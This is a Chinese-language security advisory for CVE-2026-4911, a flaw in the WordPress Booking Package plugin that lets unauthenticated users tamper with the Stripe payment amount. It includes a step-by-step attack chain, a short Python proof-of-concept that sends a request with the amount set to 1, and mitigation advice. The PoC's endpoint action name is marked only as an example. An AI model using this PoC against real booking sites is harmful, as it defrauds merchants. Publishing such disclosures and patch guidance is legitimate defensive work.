CVE-2026-4911 CVSS 5.3 中危

CVE-2026-4911 WordPress Booking Package价格操纵漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4911

漏洞类型

价格操纵漏洞

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Booking Package

漏洞概述

WordPress Booking Package插件在1.7.06及之前版本中存在价格操纵漏洞。由于`intentForStripe()`函数直接将用户控制的金额传递给Stripe API且未校验，攻击者可无需认证篡改支付金额，以极低成本预订高价服务，造成经济损失。

技术细节

该漏洞源于支付逻辑缺陷。插件在`CreditCard.php`中的`intentForStripe()`函数直接使用`$_POST['amount']`创建Stripe PaymentIntent，未与`getAmount()`计算的服务器端金额比对。同时，`commitStripe()`函数本应包含的校验代码被注释，导致确认支付时忽略了服务器计算值。因此，攻击者只需在请求中修改`amount`参数，即可绕过价格限制。由于服务器未进行二次验证，Stripe将按篡改后的金额扣款，导致攻击者获得非法折扣。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站使用了存在漏洞的WordPress Booking Package插件（版本<=1.7.06）。

STEP 2

攻击准备

攻击者选择目标服务，准备正常的预订请求，并拦截发送给服务器的数据包。

STEP 3

参数篡改

攻击者修改拦截到的请求中的`amount`参数，将其设置为极低数值（如1），并发送给服务器。

STEP 4

漏洞利用

服务器端`intentForStripe()`函数接收篡改后的金额，直接向Stripe API创建支付意图，且`commitStripe()`未进行服务器端金额校验。

STEP 5

达成效果

支付确认完成，攻击者成功以任意低价格（如0.01元）完成了高价服务的预订。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_price_manipulation(target_url, booking_data):
    """
    PoC for CVE-2026-4911: Booking Package Price Manipulation
    Demonstrates modifying the 'amount' parameter in the request.
    """
    # The vulnerable endpoint usually creates a payment intent
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Normal payment data payload
    payload = booking_data.copy()
    
    # Vulnerability: Manipulating the 'amount' directly
    # Changing the price to 1 cent (or currency unit)
    payload['amount'] = 1 
    payload['action'] = 'booking_package_stripe_intent' # Example action name
    
    try:
        response = requests.post(endpoint, data=payload)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check if booking was created with price 1.")
            print(f"[+] Response: {response.text}")
        else:
            print("[-] Request failed.")
    except Exception as e:
        print(f"[!] Error: {e}")

# Usage
target = "http://vulnerable-wordpress-site.com"
data = {"service_id": "123", "nonce": "valid_nonce_value"}
exploit_price_manipulation(target, data)

影响范围

WordPress Booking Package <= 1.7.06

防御指南

临时缓解措施

建议立即更新插件至最新安全版本。如果无法立即更新，应临时禁用Stripe支付网关以防止利用，同时部署Web应用防火墙（WAF）规则，检测并阻止包含异常金额参数的支付请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表